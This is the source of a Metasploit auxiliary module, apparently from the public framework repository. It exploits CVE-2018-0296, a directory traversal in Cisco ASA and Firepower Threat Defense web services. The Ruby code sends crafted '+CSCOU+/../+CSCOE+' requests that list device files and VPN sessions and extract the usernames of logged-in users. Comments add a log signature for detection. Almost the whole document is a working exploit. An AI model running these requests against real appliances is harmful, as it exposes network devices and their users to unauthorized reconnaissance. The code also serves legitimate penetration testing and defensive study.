GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
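# Auxiliary scanner for the Cisco ASA / FTD directory traversal tracked as
# CVE-2018-0296 (see 'References' below).
#
# Every listing request this module sends carries the path sequence
# "+CSCOU+/../+CSCOE+/files/file_list.json", and the module itself attaches no
# credentials or cookies. Reviewers of web, proxy or appliance logs can search
# for that sequence to spot use of this check.
# NOTE(review): presumably a fixed device no longer answers these paths with
# HTTP 200 -- confirm against the vendor advisory for the affected releases.
class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its options (TARGETURI, SSL, RPORT 443).
  #
  # @param info [Hash] metadata passed in by the framework and merged through
  #   update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Cisco ASA Directory Traversal',
      'Description' => %q{
        This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.
        It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.
      },
      'Author' => [ 'Michał Bentkowski', # Discovery
                    'Yassine Aboukir', # PoC
                    'Shelby Pace' # Metasploit Module
                  ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2018-0296' ],
        [ 'EDB', '44956' ]
      ],
      'DisclosureDate' => '2018-06-06'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
        Opt::RPORT(443)
      ])
  end

  # Checks whether the target serves the Cisco web logon page.
  #
  # Requests +CSCOE+/logon.html below TARGETURI and looks for any of four
  # marker strings in the response body.
  #
  # @return [Boolean] true when a response arrived and contains a marker,
  #   false otherwise (including when no response was received)
  def is_accessible?
    uri = normalize_uri(target_uri.path, '+CSCOE+/logon.html')

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => uri
    )

    # No response at all: report "not accessible" instead of nil.
    return false unless res

    body = res.body.to_s
    ['SSL VPN Service', '+CSCOE+', '+webvpn+', 'webvpnlogin'].any? { |marker| body.include?(marker) }
  end

  # Requests one listing path and prints what the device returns.
  #
  # Only HTTP 200 responses are processed. A body containing "///sessions" is
  # handed to get_sessions; any other body is printed as-is.
  #
  # @param path [String] listing path (with query string) below TARGETURI
  # @return [void]
  def list_files(path)
    uri = normalize_uri(target_uri.path, path)

    list_res = send_request_cgi(
      'method' => 'GET',
      'uri' => uri
    )

    return unless list_res && list_res.code == 200

    if list_res.body.match(/\/{3}sessions/)
      get_sessions(list_res.body)
    else
      # The body is device-controlled data and is printed verbatim.
      print_good(list_res.body)
    end
  end

  # Extracts session numbers from a sessions listing and looks up their users.
  #
  # Every run of two or more digits in the body is treated as a session
  # number, so unrelated numeric fields in the listing are picked up as well.
  #
  # @param response [String] body of the sessions listing response
  # @return [void]
  def get_sessions(response)
    # No capture group, so scan yields a flat array of strings rather than an
    # array of one-element arrays; uniq avoids asking twice for the same number.
    session_nos = response.scan(/[0-9]{2,}/).uniq

    if session_nos.empty?
      print_status("Could not detect any sessions")
      print("\n")
      return
    end

    print_good(response)
    list_users(session_nos)
  end

  # Requests the listing of each session and prints the "user:<name>" entries
  # found in the responses.
  #
  # @param sessions [Array<String>] session numbers taken from the listing
  # @return [void]
  def list_users(sessions)
    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
    user_ids = []

    sessions.each do |session_no|
      users_res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, sessions_uri, session_no)
      )

      next unless users_res && users_res.body.include?('name')

      # A body can contain 'name' without a "user:<name>" entry. The original
      # code pushed an empty string in that case (nil.to_s), which was then
      # printed as a blank "logged in" user; such responses are skipped now.
      user = users_res.body[/user:\w+/]
      user_ids.push(user) if user
    end

    if user_ids.empty?
      print_status("There are no users logged in currently")
    else
      print_status('Users logged in:')
      user_ids.each { |id| print_good(id) }
      print("\n")
    end
  end

  # Entry point: confirms the logon service is reachable, then requests the
  # root, sessions and +CSCOE+ listings in that order.
  #
  # @return [void]
  def run
    file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'
    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
    cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'

    paths = [file_uri, sessions_uri, cscoe_uri]

    unless is_accessible?
      fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')
    end

    paths.each { |path| list_files(path) }
  end
end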